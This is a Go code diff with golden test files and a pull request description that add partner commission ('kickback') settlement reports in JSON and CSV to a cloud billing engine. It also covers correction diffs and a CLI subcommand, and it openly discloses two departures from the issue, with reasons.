+	// statements.Key rendering; Cloud and ProjectID are its two halves.
+	StatementKey     string
+	Cloud, ProjectID string
+	RelationID       uuid.UUID
+	Scope            string
+	Rate             decimal.Decimal
+	Base, Amount     decimal.Decimal
+}
+
+// kickbackKey is what the two sides of a correction's kickbacks are compared
+// under: the statement the kickback was applied to, the relation it came from,
+// and the scope and the rate of the element. It is corrections.AdjustmentKey
+// without the type, which is the kickback type on every row that gets here.
+//
+// Rate is the six-place text money.RatePlaces renders, the scale the
+// adjustment schema admits, because a decimal is not a map key.
+type kickbackKey struct {
+	StatementKey string
+	RelationID   uuid.UUID
+	Scope, Rate  string
+}
+
+// loadKickbacks reads what the run settles for its partners. A regular run's
+// kickbacks are its adjustment records of type kickback. A correction's are
+// the differences to the kickbacks of the run it corrects, and both sides are
+// read inside the snapshot Load opened, so a difference is taken between two
+// states of one instant.
+func loadKickbacks(ctx context.Context, q *sqlcgen.Queries, run Run) ([]Kickback, error) {
+	rows, err := q.ListAdjustmentRecords(ctx, pgtype.UUID{Bytes: run.ID, Valid: true})
+	if err != nil {
+		return nil, fmt.Errorf("reading the adjustment records of run %s: %w", run.ID, err)
+	}
+	current, err := kickbacksOf(rows, run.ID)
+	if err != nil {
+		return nil, err
+	}
+	if run.Kind != runs.KindCorrection {
+		sortKickbacks(current)
+		return current, nil
+	}
+
+	// runs.corrects_run_id carries no CHECK tying it to the correction kind, the
+	// way billing_periods and adjustment_records tie their columns, so a
+	// correction row that names no corrected run is one the schema admits. It is
+	// refused rather than diffed against the empty baseline the nil uuid reads
+	// back: that baseline reports the correction's whole month as differences,
+	// and a partner already settled from the regular run's report would be owed
+	// the same amounts a second time.
+	if run.CorrectsRunID == uuid.Nil {
+		return nil, fmt.Errorf(
+			"the correction run %s names no corrected run, and its kickbacks are the differences to one",
+			run.ID)
+	}
+
+	rows, err = q.ListAdjustmentRecords(ctx, pgtype.UUID{Bytes: run.CorrectsRunID, Valid: true})
+	if err != nil {
+		return nil, fmt.Errorf("reading the adjustment records of the corrected run %s: %w",
+			run.CorrectsRunID, err)
+	}
+	old, err := kickbacksOf(rows, run.CorrectsRunID)
+	if err != nil {
+		return nil, err
+	}
+	return DiffKickbacks(old, current), nil
+}
+
+// kickbacksOf keeps the kickbacks of one run's adjustment records. The listing
+// hands back every type a run applied, and a surcharge or a discount is what a
+// project was billed rather than what a partner is settled with, so the other
+// three types are skipped here.
+//
+// A stored rate, base or amount that is not a number is refused by naming the
+// row it was read from, the way loadRated refuses a rated amount: a payout
+// short of a value, or one holding a zero where a number was meant, is one
+// nobody can tell from a correct one.
+func kickbacksOf(rows []sqlcgen.AdjustmentRecord, runID uuid.UUID) ([]Kickback, error) {
+	result := make([]Kickback, 0, len(rows))
+	for _, row := range rows {
+		if row.Type != adjustment.TypeKickback {
+			continue
+		}
+		relationID := uuid.UUID(row.RelationID.Bytes)
+		// The CHECK of migration 0002 ties a non-null beneficiary to the kickback
+		// type, so a kickback row without one does not reach this. It is checked
+		// rather than rendered under an empty name: a payout nobody is named for
+		// is one no partner can be settled from.
+		if !row.Beneficiary.Valid {
+			return nil, fmt.Errorf("the kickback of relation %s on %s of run %s names no beneficiary",
+				relationID, row.ProjectID, runID)
+		}
+		rate, rateNumber := amountOf(row.Rate)
+		base, baseNumber := amountOf(row.Base)
+		amount, amountNumber := amountOf(row.Amount)
+		if !rateNumber || !baseNumber || !amountNumber {
+			return nil, fmt.Errorf("the kickback of relation %s on %s of run %s is not a number",
+				relationID, row.ProjectID, runID)
+		}
+		cloud, projectID, err := statements.ParseKey(row.ProjectID)
+		if err != nil {
+			return nil, fmt.Errorf("the kickback of relation %s of run %s: %w", relationID, runID, err)
+		}
+		result = append(result, Kickback{
+			Beneficiary:  row.Beneficiary.String,
+			Currency:     row.Currency,
+			StatementKey: row.ProjectID,
+			Cloud:        cloud,
+			ProjectID:    projectID,
+			RelationID:   relationID,
+			Scope:        row.Scope,
+			Rate:         rate,
+			Base:         base,
+			Amount:       amount,
+		})
+	}
+	return result, nil
+}
+
+// DiffKickbacks is what changed between the kickbacks of a correction and
+// those of the run it corrects: one Kickback per key they disagree on.
+//
+// The key is the statement, the relation, the scope and the rate, which is
+// what corrections.DiffAdjustments diffs a credit note by. Base and Amount are
+// summed per key on each side first, so two elements of one relation under one
+// key are one kickback there, and the result carries current minus old. A key
+// one side does not hold reads as zero on that side: a kickback the correction
+// no longer settles is taken back whole, and one it settles for the first time
+// is added whole.
+//
+// A key whose amount difference is zero is left out, whatever its base
+// difference did, because DiffAdjustments drops it too and the report follows
+// the credit note. Beneficiary, Currency, Cloud, ProjectID and Rate come from
+// the current side where it holds the key and from the old side otherwise,
+// while the statement, the relation and the scope are the key's. The result is
+// sorted the way sortKickbacks sorts a run's own kickbacks, and two sides that
+// settle the same, two empty ones included, yield nil rather than an empty
+// slice.
+func DiffKickbacks(old, current []Kickback) []Kickback {
+	oldSums, currentSums := sumKickbacks(old), sumKickbacks(current)
+
+	var result []Kickback
+	for key, kickback := range currentSums {
+		// A key old does not hold reads as the zero decimal, which is what the
+		// correction settling the kickback for the first time is diffed against.
+		result = appendKickbackDifference(result, kickback,
+			kickback.Base.Sub(oldSums[key].Base), kickback.Amount.Sub(oldSums[key].Amount))
+	}
+	for key, kickback := range oldSums {
+		if _, held := currentSums[key]; held {
+			continue
+		}
+		result = appendKickbackDifference(result, kickback, kickback.Base.Neg(), kickback.Amount.Neg())
+	}
+
+	sortKickbacks(result)
+	return result
+}
+
+// sumKickbacks adds up what one side of the diff settled per key. One relation
+// contributes at most one element per type and scope, so two kickbacks under
+// one key are two records of the same relation over the same statement, and
+// what the diff compares is their sum, the way baselineAdjustments in
+// internal/engine/runs/correct.go sums the adjustment records of a corrected
+// run. The first kickback under a key carries the names and the rate the sum
+// is reported with; every later one adds its base and its amount.
+func sumKickbacks(kickbacks []Kickback) map[kickbackKey]Kickback {
+	sums := make(map[kickbackKey]Kickback, len(kickbacks))
+	for _, kickback := range kickbacks {
+		key := kickbackKey{
+			StatementKey: kickback.StatementKey,
+			RelationID:   kickback.RelationID,
+			Scope:        kickback.Scope,
+			Rate:         kickback.Rate.StringFixed(money.RatePlaces),
+		}
+		sum, held := sums[key]
+		if !held {
+			sum = kickback
+			sum.Base, sum.Amount = decimal.Zero, decimal.Zero
+		}
+		sum.Base = sum.Base.Add(kickback.Base)
+		sum.Amount = sum.Amount.Add(kickback.Amount)
+		sums[key] = sum
+	}
+	return sums
+}
+
+// appendKickbackDifference keeps one difference where there is one. The names
+// and the rate come from the side the key was read off, and the two amounts
+// replace what that side settled. A zero amount difference is dropped whatever
+// the base did, the way appendAdjustmentDelta drops it.
+func appendKickbackDifference(result []Kickback, kickback Kickback, base, amount decimal.Decimal) []Kickback {
+	if amount.IsZero() {
+		return result
+	}
+	kickback.Base, kickback.Amount = base, amount
+	return append(result, kickback)
+}
+
+// sortKickbacks puts the kickbacks in the order a settlement is read in: the
+// partner first, because what one partner is owed is one block, and then the
+// statement, the relation and the element under it. The order is total over
+// what a run can store, so exporting one run twice yields one order.
+func sortKickbacks(kickbacks []Kickback) {
+	slices.SortFunc(kickbacks, func(a, b Kickback) int {
+		return cmp.Or(
+			cmp.Compare(a.Beneficiary, b.Beneficiary),
+			cmp.Compare(a.Currency, b.Currency),
+			cmp.Compare(a.StatementKey, b.StatementKey),
+			// Over the sixteen bytes rather than over the text they render as,
+			// which is the order Postgres sorts a uuid in.
+			bytes.Compare(a.RelationID[:], b.RelationID[:]),
+			cmp.Compare(a.Scope, b.Scope),
+			a.Rate.Cmp(b.Rate),
+			a.Amount.Cmp(b.Amount),
+			a.Base.Cmp(b.Base),
+		)
+	})
+}

--- a/internal/engine/export/kickbacks.go
+++ b/internal/engine/export/kickbacks.go
@@ -18,6 +18,28 @@ import (
 	"github.com/b42labs/tally/internal/engine/store/sqlcgen"
 )
 
+// The two files the settlement is written to: the document by the JSON writer
+// and the table by the CSV writer.
+const (
+	kickbacksJSONFileName = "kickbacks.json"
+	kickbacksCSVFileName  = "kickbacks.csv"
+)
+
+// kickbacksHeader is the column order of kickbacks.csv. The fourteen columns
+// are aligned with ratedHeader and deltasHeader rather than the ten the
+// roadmap's WP 5.4 lists (author's decision of 2026-08-27, named here per
+// guardrail 10 of roadmap/00-conventions.md): adjustment_records.project_id
+// holds the statement key cloud/project, and every other artifact renders that
+// pair as two members, because external project ids are unique per cloud only.
+// kind and corrects_run_id say whether a row is a difference a correction owes
+// rather than a payout of the month, and relation_id is what the auditability
+// drill walks back to the registry.
+var kickbacksHeader = []string{
+	"run_id", "kind", "corrects_run_id", "period_from", "period_to",
+	"beneficiary", "cloud", "project_id", "relation_id", "scope",
+	"rate", "base", "amount", "currency",
+}
+
 // Kickback is one kickback a run settles for a partner. For a regular run it
 // is one adjustment_records row of type kickback. For a correction it is one
 // non-zero difference between the correction's kickback records and those of
@@ -243,4 +265,147 @@ func sortKickbacks(kickbacks []Kickback) {
 			a.Base.Cmp(b.Base),
 		)
 	})
+}
+
+// kickbacksDocument is kickbacks.json: the run the settlement belongs to and
+// one entry per partner it owes. The field order is the order it is marshalled
+// in, and nothing here records when the report ran, for the reason runDocument
+// gives.
+//
+// A correction's entries carry the differences to the run it corrects under the
+// same shape a regular run's payouts take. Kind and CorrectsRunID are what say
+// which of the two a document holds, so a partner reads a month and the
+// correction of it with one reader rather than with two.
+type kickbacksDocument struct {
+	RunID string `json:"run_id"`
+	Kind  string `json:"kind"`
+	// A pointer, so a regular run renders null the way runDocument renders the
+	// run it corrects.
+	CorrectsRunID *string `json:"corrects_run_id"`
+	PeriodFrom    string  `json:"period_from"`
+	PeriodTo      string  `json:"period_to"`
+	// Never nil, so a run that owes nobody renders an empty list rather than a
+	// null: it settles nothing, and a null would read as a report that does not
+	// say.
+	Beneficiaries []beneficiaryEntry `json:"beneficiaries"`
+}
+
+// beneficiaryEntry is what one partner is settled with in one currency: the
+// total it is paid, the number of projects that total came off, and the rows it
+// was summed from. Two currencies under one partner are two entries, because a
+// sum over two of them is not a payout anybody can make.
+type beneficiaryEntry struct {
+	Beneficiary   string          `json:"beneficiary"`
+	Currency      string          `json:"currency"`
+	KickbackTotal money.Amount    `json:"kickback_total"`
+	Projects      int             `json:"projects"`
+	Breakdown     []kickbackEntry `json:"breakdown"`
+}
+
+// kickbackEntry is one settled kickback under a partner: the statement it came
+// off, the relation and the element it was computed from, and the three numbers
+// the partner reconciles the payout against.
+type kickbackEntry struct {
+	Cloud string `json:"cloud"`
+	// Two members for the reason json.go gives for the index entries: external
+	// project ids are unique per cloud only.
+	ProjectID  string       `json:"project_id"`
+	RelationID string       `json:"relation_id"`
+	Scope      string       `json:"scope"`
+	Rate       money.Rate   `json:"rate"`
+	Base       money.Amount `json:"base"`
+	Amount     money.Amount `json:"amount"`
+}
+
+// KickbacksJSON renders the partner-facing settlement document of a run: per
+// beneficiary and currency what the partner is owed, over how many projects,
+// and the kickbacks that total was summed from.
+func KickbacksJSON(run Run) ([]byte, error) {
+	// Sorted here rather than taken as it comes: the bytes are a function of the
+	// set the run settles rather than of the order it was handed over in. The
+	// copy leaves the caller's slice as it is.
+	kickbacks := slices.Clone(run.Kickbacks)
+	sortKickbacks(kickbacks)
+
+	document := kickbacksDocument{
+		RunID:         run.ID.String(),
+		Kind:          run.Kind,
+		PeriodFrom:    instant(run.PeriodFrom),
+		PeriodTo:      instant(run.PeriodTo),
+		Beneficiaries: []beneficiaryEntry{},
+	}
+	if run.CorrectsRunID != uuid.Nil {
+		corrects := run.CorrectsRunID.String()
+		document.CorrectsRunID = &corrects
+	}
+
+	for i, kickback := range kickbacks {
+		// The order sorts by the partner and the currency first, so a group ends
+		// where either of them changes.
+		opened := i == 0 || kickback.Beneficiary != kickbacks[i-1].Beneficiary ||
+			kickback.Currency != kickbacks[i-1].Currency
+		if opened {
+			document.Beneficiaries = append(document.Beneficiaries, beneficiaryEntry{
+				Beneficiary: kickback.Beneficiary,
+				Currency:    kickback.Currency,
+			})
+		}
+
+		entry := &document.Beneficiaries[len(document.Beneficiaries)-1]
+		// The statement key orders inside a group, so a project is a further one
+		// where it differs from the kickback before it.
+		if opened || kickback.StatementKey != kickbacks[i-1].StatementKey {
+			entry.Projects++
+		}
+		// The total is the sum of what the rows below it carry, which are amounts
+		// the rating rounded already: summing them is what keeps the payout equal
+		// to the lines the partner reconciles it against.
+		entry.KickbackTotal = money.NewAmount(entry.KickbackTotal.Add(kickback.Amount))
+		entry.Breakdown = append(entry.Breakdown, kickbackEntry{
+			Cloud:      kickback.Cloud,
+			ProjectID:  kickback.ProjectID,
+			RelationID: kickback.RelationID.String(),
+			Scope:      kickback.Scope,
+			Rate:       money.NewRate(kickback.Rate),
+			Base:       money.NewAmount(kickback.Base),
+			Amount:     money.NewAmount(kickback.Amount),
+		})
+	}
+
+	body, err := marshal(document)
+	if err != nil {
+		return nil, fmt.Errorf("rendering %s of run %s: %w", kickbacksJSONFileName, run.ID, err)
+	}
+	return body, nil
+}
+
+// KickbacksCSV renders kickbacks.csv: the header and one row per kickback, in
+// the order the settlement is read in. Every row carries the run, its kind and
+// its period, the way a row of rated.csv does, so a row says which run and
+// which month it belongs to on its own.
+//
+// A run that settles nothing renders the header alone: an empty table says the
+// run owes no partner, and a missing file says nothing at all.
+func KickbacksCSV(run Run) ([]byte, error) {
+	kickbacks := slices.Clone(run.Kickbacks)
+	sortKickbacks(kickbacks)
+
+	corrects := correctsOf(run)
+	from, to := instant(run.PeriodFrom), instant(run.PeriodTo)
+
+	rows := [][]string{kickbacksHeader}
+	for _, kickback := range kickbacks {
+		rows = append(rows, []string{
+			run.ID.String(), run.Kind, corrects, from, to,
+			cell(kickback.Beneficiary), cell(kickback.Cloud), cell(kickback.ProjectID),
+			kickback.RelationID.String(), cell(kickback.Scope),
+			// The three numbers do not go through cell: a leading minus is the sign
+			// of what a correction takes back rather than a formula.
+			kickback.Rate.StringFixed(money.RatePlaces),
+			kickback.Base.StringFixed(money.AmountPlaces),
+			kickback.Amount.StringFixed(money.AmountPlaces),
+			kickback.Currency,
+		})
+	}
+	return table(run, kickbacksCSVFileName, rows)
 }

--- a/internal/engine/export/kickbacks.go
+++ b/internal/engine/export/kickbacks.go
@@ -4,15 +4,20 @@ import (
 	"bytes"
 	"cmp"
 	"context"
+	"errors"
 	"fmt"
 	"slices"
+	"time"
 
 	"github.com/google/uuid"
+	"github.com/jackc/pgx/v5"
 	"github.com/jackc/pgx/v5/pgtype"
+	"github.com/jackc/pgx/v5/pgxpool"
 	"github.com/shopspring/decimal"
 
 	"github.com/b42labs/tally/internal/core/adjustment"
 	"github.com/b42labs/tally/internal/core/money"
+	"github.com/b42labs/tally/internal/engine/period"
 	"github.com/b42labs/tally/internal/engine/runs"
 	"github.com/b42labs/tally/internal/engine/statements"
 	"github.com/b42labs/tally/internal/engine/store/sqlcgen"
@@ -408,4 +413,67 @@ func KickbacksCSV(run Run) ([]byte, error) {
 		})
 	}
 	return table(run, kickbacksCSVFileName, rows)
+}
+
+// ErrNoRunForPeriod is what PeriodRun returns for a billing period no
+// completed or finalized regular run bills.
+var ErrNoRunForPeriod = errors.New("the billing period has no run to report")
+
+// PeriodRun is the run a period's kickbacks are reported from when the caller
+// names the month alone: the regular run that closed it, or the completed
+// regular run of a month that is still open.
+//
+// A finalized correction of the month is never what the month alone resolves
+// to. What a partner is settled for a month is what the regular run of that
+// month settled, and a correction carries the differences on top of that
+// settlement, which are reported by naming the correction with --run.
+//
+// The period and the run are read under one REPEATABLE READ snapshot, because
+// closing a month moves its regular run out of the status the second read
+// filters on: finalize commits FinalizeRun and FinalizeBillingPeriod together,
+// so a month closed between two separate reads would be read as still open and
+// then leave no completed regular run to find. The month that was just closed
+// would be refused as one that was never billed, and the operator would be sent
+// to start a regular run over a period the engine refuses one for. The
+// transaction is read-only and ended by the rollback below: resolving a run
+// writes nothing.
+func PeriodRun(ctx context.Context, pool *pgxpool.Pool, periodFrom time.Time) (uuid.UUID, error) {
+	month := period.Format(periodFrom)
+	tx, err := pool.BeginTx(ctx, pgx.TxOptions{IsoLevel: pgx.RepeatableRead, AccessMode: pgx.ReadOnly})
+	if err != nil {
+		return uuid.Nil, fmt.Errorf("reading the run of %s: %w", month, err)
+	}
+	// The rollback that ends the snapshot, on a context no cancellation reaches,
+	// the way Load ends its own.
+	defer func() { _ = tx.Rollback(context.WithoutCancel(ctx)) }()
+
+	q := sqlcgen.New(tx)
+	from := pgtype.Timestamptz{Time: periodFrom, Valid: true}
+
+	row, err := q.GetBillingPeriod(ctx, from)
+	if err != nil {
+		if errors.Is(err, pgx.ErrNoRows) {
+			return uuid.Nil, fmt.Errorf(
+				"%w: %s has no billing period, and tally-engine run --period %s produces one",
+				ErrNoRunForPeriod, month, month)
+		}
+		return uuid.Nil, fmt.Errorf("reading the billing period %s: %w", month, err)
+	}
+	// The CHECK of migration 0001 ties the name to the status, so a finalized
+	// period names a run. That run is the regular one that closed the month:
+	// finalizing a correction of it leaves the name where it is.
+	if row.Status == statusFinalized {
+		return uuid.UUID(row.FinalizedRunID.Bytes), nil
+	}
+
+	id, err := q.LatestCompletedRegularRun(ctx, from)
+	if err != nil {
+		if errors.Is(err, pgx.ErrNoRows) {
+			return uuid.Nil, fmt.Errorf(
+				"%w: %s has no completed run, and tally-engine run --period %s produces one",
+				ErrNoRunForPeriod, month, month)
+		}
+		return uuid.Nil, fmt.Errorf("reading the completed run of %s: %w", month, err)
+	}
+	return uuid.UUID(id.Bytes), nil
 }

--- a/internal/engine/export/testdata/golden/correction/kickbacks.csv
+++ b/internal/engine/export/testdata/golden/correction/kickbacks.csv
@@ -1,0 +1,1 @@
+run_id,kind,corrects_run_id,period_from,period_to,beneficiary,cloud,project_id,relation_id,scope,rate,base,amount,currency

--- a/internal/engine/export/testdata/golden/correction/kickbacks.json
+++ b/internal/engine/export/testdata/golden/correction/kickbacks.json
@@ -1,0 +1,8 @@
+{
+  "run_id": "4b9d2c17-6e85-4f3a-8a01-c5d4e6f7a8b9",
+  "kind": "correction",
+  "corrects_run_id": "3f1e6a58-9c24-4d0b-8f77-2a5c1b93e0d4",
+  "period_from": "2026-03-01T00:00:00Z",
+  "period_to": "2026-04-01T00:00:00Z",
+  "beneficiaries": []
+}

--- a/internal/engine/export/testdata/golden/kickbacks/correction.csv
+++ b/internal/engine/export/testdata/golden/kickbacks/correction.csv
@@ -1,0 +1,3 @@
+run_id,kind,corrects_run_id,period_from,period_to,beneficiary,cloud,project_id,relation_id,scope,rate,base,amount,currency
+4b9d2c17-6e85-4f3a-8a01-c5d4e6f7a8b9,correction,3f1e6a58-9c24-4d0b-8f77-2a5c1b93e0d4,2026-03-01T00:00:00Z,2026-04-01T00:00:00Z,partner-corp,os-prod,customer-proj-1,11111111-1111-1111-1111-111111111111,all,0.100000,-20.40,-2.04,EUR
+4b9d2c17-6e85-4f3a-8a01-c5d4e6f7a8b9,correction,3f1e6a58-9c24-4d0b-8f77-2a5c1b93e0d4,2026-03-01T00:00:00Z,2026-04-01T00:00:00Z,partner-corp,os-prod,customer-proj-2,22222222-2222-2222-2222-222222222222,all,0.100000,-500.00,-50.00,EUR

--- a/internal/engine/export/testdata/golden/kickbacks/correction.json
+++ b/internal/engine/export/testdata/golden/kickbacks/correction.json
@@ -1,0 +1,35 @@
+{
+  "run_id": "4b9d2c17-6e85-4f3a-8a01-c5d4e6f7a8b9",
+  "kind": "correction",
+  "corrects_run_id": "3f1e6a58-9c24-4d0b-8f77-2a5c1b93e0d4",
+  "period_from": "2026-03-01T00:00:00Z",
+  "period_to": "2026-04-01T00:00:00Z",
+  "beneficiaries": [
+    {
+      "beneficiary": "partner-corp",
+      "currency": "EUR",
+      "kickback_total": -52.04,
+      "projects": 2,
+      "breakdown": [
+        {
+          "cloud": "os-prod",
+          "project_id": "customer-proj-1",
+          "relation_id": "11111111-1111-1111-1111-111111111111",
+          "scope": "all",
+          "rate": 0.100000,
+          "base": -20.40,
+          "amount": -2.04
+        },
+        {
+          "cloud": "os-prod",
+          "project_id": "customer-proj-2",
+          "relation_id": "22222222-2222-2222-2222-222222222222",
+          "scope": "all",
+          "rate": 0.100000,
+          "base": -500.00,
+          "amount": -50.00
+        }
+      ]
+    }
+  ]
+}

--- a/internal/engine/export/testdata/golden/kickbacks/regular.csv
+++ b/internal/engine/export/testdata/golden/kickbacks/regular.csv
@@ -1,0 +1,6 @@
+run_id,kind,corrects_run_id,period_from,period_to,beneficiary,cloud,project_id,relation_id,scope,rate,base,amount,currency
+3f1e6a58-9c24-4d0b-8f77-2a5c1b93e0d4,regular,,2026-03-01T00:00:00Z,2026-04-01T00:00:00Z,partner-corp,os-dr,customer-proj-1,33333333-3333-3333-3333-333333333333,openstack.instance,0.050000,200.00,10.00,EUR
+3f1e6a58-9c24-4d0b-8f77-2a5c1b93e0d4,regular,,2026-03-01T00:00:00Z,2026-04-01T00:00:00Z,partner-corp,os-prod,customer-proj-1,11111111-1111-1111-1111-111111111111,all,0.100000,1020.00,102.00,EUR
+3f1e6a58-9c24-4d0b-8f77-2a5c1b93e0d4,regular,,2026-03-01T00:00:00Z,2026-04-01T00:00:00Z,partner-corp,os-prod,customer-proj-2,22222222-2222-2222-2222-222222222222,all,0.100000,500.00,50.00,EUR
+3f1e6a58-9c24-4d0b-8f77-2a5c1b93e0d4,regular,,2026-03-01T00:00:00Z,2026-04-01T00:00:00Z,partner-corp,os-prod,customer-proj-2,55555555-5555-5555-5555-555555555555,openstack.volume,0.100000,100.00,10.00,EUR
+3f1e6a58-9c24-4d0b-8f77-2a5c1b93e0d4,regular,,2026-03-01T00:00:00Z,2026-04-01T00:00:00Z,partner-two,os-prod,customer-proj-2,44444444-4444-4444-4444-444444444444,all,0.020000,500.00,10.00,EUR

--- a/internal/engine/export/testdata/golden/kickbacks/regular.json
+++ b/internal/engine/export/testdata/golden/kickbacks/regular.json
@@ -1,0 +1,70 @@
+{
+  "run_id": "3f1e6a58-9c24-4d0b-8f77-2a5c1b93e0d4",
+  "kind": "regular",
+  "corrects_run_id": null,
+  "period_from": "2026-03-01T00:00:00Z",
+  "period_to": "2026-04-01T00:00:00Z",
+  "beneficiaries": [
+    {
+      "beneficiary": "partner-corp",
+      "currency": "EUR",
+      "kickback_total": 172.00,
+      "projects": 3,
+      "breakdown": [
+        {
+          "cloud": "os-dr",
+          "project_id": "customer-proj-1",
+          "relation_id": "33333333-3333-3333-3333-333333333333",
+          "scope": "openstack.instance",
+          "rate": 0.050000,
+          "base": 200.00,
+          "amount": 10.00
+        },
+        {
+          "cloud": "os-prod",
+          "project_id": "customer-proj-1",
+          "relation_id": "11111111-1111-1111-1111-111111111111",
+          "scope": "all",
+          "rate": 0.100000,
+          "base": 1020.00,
+          "amount": 102.00
+        },
+        {
+          "cloud": "os-prod",
+          "project_id": "customer-proj-2",
+          "relation_id": "22222222-2222-2222-2222-222222222222",
+          "scope": "all",
+          "rate": 0.100000,
+          "base": 500.00,
+          "amount": 50.00
+        },
+        {
+          "cloud": "os-prod",
+          "project_id": "customer-proj-2",
+          "relation_id": "55555555-5555-5555-5555-555555555555",
+          "scope": "openstack.volume",
+          "rate": 0.100000,
+          "base": 100.00,
+          "amount": 10.00
+        }
+      ]
+    },
+    {
+      "beneficiary": "partner-two",
+      "currency": "EUR",
+      "kickback_total": 10.00,
+      "projects": 1,
+      "breakdown": [
+        {
+          "cloud": "os-prod",
+          "project_id": "customer-proj-2",
+          "relation_id": "44444444-4444-4444-4444-444444444444",
+          "scope": "all",
+          "rate": 0.020000,
+          "base": 500.00,
+          "amount": 10.00
+        }
+      ]
+    }
+  ]
+}

--- a/internal/engine/export/testdata/golden/regular/kickbacks.csv
+++ b/internal/engine/export/testdata/golden/regular/kickbacks.csv
@@ -1,0 +1,1 @@
+run_id,kind,corrects_run_id,period_from,period_to,beneficiary,cloud,project_id,relation_id,scope,rate,base,amount,currency

--- a/internal/engine/export/testdata/golden/regular/kickbacks.json
+++ b/internal/engine/export/testdata/golden/regular/kickbacks.json
@@ -1,0 +1,8 @@
+{
+  "run_id": "3f1e6a58-9c24-4d0b-8f77-2a5c1b93e0d4",
+  "kind": "regular",
+  "corrects_run_id": null,
+  "period_from": "2026-03-01T00:00:00Z",
+  "period_to": "2026-04-01T00:00:00Z",
+  "beneficiaries": []
+}


### PR DESCRIPTION
Closes #57

Turns the `adjustment_records` rows of type `kickback` that #56 stores per run into the settlement document a partner is paid from, per WP 5.4 of `roadmap/05-phase-5-commercial-pricing.md`. The loader reads a run's kickbacks beside its statements, both file writers put `kickbacks.json` / `kickbacks.csv` next to the artifacts they already write, and a new `tally-engine kickbacks` subcommand prints the same document for a month or a run.

## The change set, in commit order

**`78dcb5a` Load the kickbacks of a run and diff a correction's** — adds `internal/engine/export/kickbacks.go` with the `Kickback` type and `loadKickbacks`, called from `Load` inside the REPEATABLE READ snapshot it already opens, so a payout and the statements it was computed beside come from one state of the database. Of the four adjustment types only `kickback` rows name a beneficiary; surcharges, discounts and project discounts are what a project was billed and are skipped. A stored rate, base or amount that is not a number is refused by naming the row it was read from. `DiffKickbacks(old, current)` gives a correction's kickbacks as the differences to the run it corrects, keyed the way `corrections.DiffAdjustments` diffs a credit note (statement key, relation, scope, rate); a key whose amount difference is zero is dropped the way the credit note drops it, so the report and the credit note settle the same lines.

**`6ac5778` Render the partner settlement as JSON and CSV** — `KickbacksJSON` groups the kickbacks per beneficiary and currency with `kickback_total`, `projects` and a per-record `breakdown`; `KickbacksCSV` renders the fourteen-column table. Both sort a clone of `run.Kickbacks` rather than printing them in hand-over order, so the bytes are a function of the set the run settles and the caller's slice is untouched. The free-text identifiers (`beneficiary`, `cloud`, `project_id`, `scope`) go through the same formula prefix `rated.csv` applies; `rate`, `base` and `amount` do not, because a leading minus there is the sign of what a correction takes back.

**`2d3172b` Write kickbacks.json and kickbacks.csv beside the statements** — `JSONFiles.Export` renders the settlement before the directory is touched and hands it to `writeIndexedFiles` with the documents, so it is on stable storage before `run.json` names the month; `run.json` does not index it, the name being fixed the way `rated.csv` is. `CSVFiles.Export` appends `kickbacks.csv` after `deltas.csv`. Both write the file for every run, one that owes nobody included — an empty beneficiary list and a header-only table say the run settles nothing, a missing file says nothing at all.

**`1560238` Resolve the run a billing month's kickbacks are reported from** — `PeriodRun` answers a caller who names the month alone: the regular run that closed a finalized period (read off `finalized_run_id`, which a CHECK ties to the status), or the latest completed regular run while the month is still open. A finalized correction of the month is never what the month resolves to — the partner was paid what the regular run settled, and a correction's differences are reached with `--run`. Both refusals name `tally-engine run --period <month>` as the command that produces a run.

**`78e1de6` Add the tally-engine kickbacks subcommand** — `kickbacks --period <YYYY-MM> [--run <id>] [--format json|csv] [--beneficiary <partner>]`, registered after `export`. Flags are validated before any configuration is read, the way `run` and `export` check theirs. The run's status is re-read outside the snapshot it was loaded under, so a run superseded while its records were being read is refused rather than reported, and a run of another month is refused with `runs.ErrPeriodMismatch`. The document is the only thing written to stdout, in one `Write`, so it pipes into a file or a partner mailer as it is. `export` names the settlement file in its help text and in the lines it prints (`wrote kickbacks.json with N kickbacks`, `kickback deltas` for a correction).

## Author decisions and roadmap readings

Recorded per guardrail 10 of `roadmap/00-conventions.md`:

- **Fourteen CSV columns, not the roadmap's ten** (`run_id, kind, corrects_run_id, period_from, period_to, beneficiary, cloud, project_id, relation_id, scope, rate, base, amount, currency`), aligned with `rated.csv` and `deltas.csv`. `adjustment_records.project_id` holds the statement key `cloud/project`, and every other artifact renders that pair as two columns because external project ids are unique per cloud only; `kind` and `corrects_run_id` say whether a row is a difference, and `relation_id` is what the auditability drill walks back to the registry.
- **A correction's entries keep the regular shape, carrying differences.** No `old` / `new` / `delta` members are mirrored from the credit note: a partner is paid the sum of what the report lists either way, `corrects_run_id` names the run that holds the earlier values, and a second shape would be a second importer for the same settlement.
- **`export_kickbacks(run)` lands as `Run.Kickbacks` plus one more file per writer**, not as a second method on `BillingExporter` — the one-method interface stays what an ERP adapter implements.
- **The aggregate runs in Go** over the rows `ListAdjustmentRecords` already returns, so a regular run and a correction share one code path, no query is added and `make generate` changes nothing.
- **`kickbacks` prints to stdout**, with no `--out`: the roadmap gives the command none, every other subcommand prints what it produced, and the file form is what `export` writes.

## Divergences from the issue

- **`--beneficiary` was added**, which the issue listed under Non-Goals. The full document names what every partner is paid and, through the `base` of each breakdown entry, what each customer project was billed, so a copy handed to one partner discloses the others; the flag renders one partner's kickbacks alone. A name the run settles nothing under is refused rather than answered with an empty document, so a typo cannot be mistaken for a month a partner is genuinely owed nothing for. Covered by the `reports one partner alone` and `refuses a partner the run settles nothing for` subtests of `TestKickbacksCLI`.
- **The subcommand uses a new `export.LoadKickbacks`** rather than `export.Load` as the issue specified. It is the same read under the same snapshot and the same refusals, minus the statements, the rated records and a correction's deltas, which this report renders none of — a month of rated records is tens of thousands of rows with a usage object each, decoded for nothing. `Load` is unchanged for the export path; both share one internal `load`.

## Tests

New: `TestLoadReadsTheKickbacksOfARun`, `TestLoadDiffsTheKickbacksOfACorrection`, `TestLoadKickbacksReadsTheSettlementAlone`, `TestPeriodRun` (integration); `TestDiffKickbacks`, `TestKickbacksGolden`, `TestKickbacksJSONWithoutKickbacks`, `TestKickbacksCSVWithoutRows`, `TestKickbacksRenderInOneOrder`, `TestKickbacksCSVRefusesAFormulaToTheSpreadsheet` (unit, with goldens under `testdata/golden/kickbacks/`); `TestKickbacksCLI` end to end over a seeded month, its correction and the refusals. Extended: `TestLoadRefusals` for the non-numeric kickback paths, `TestExportGolden` and the writer cases for the new files, `TestExportCLI` for the new lines, and the flag-validation cases in `main_test.go`.

---

_Implemented by [planwerk-agent](https://github.com/planwerk/planwerk-agent) 2ff29db with Claude:claude-opus-5_
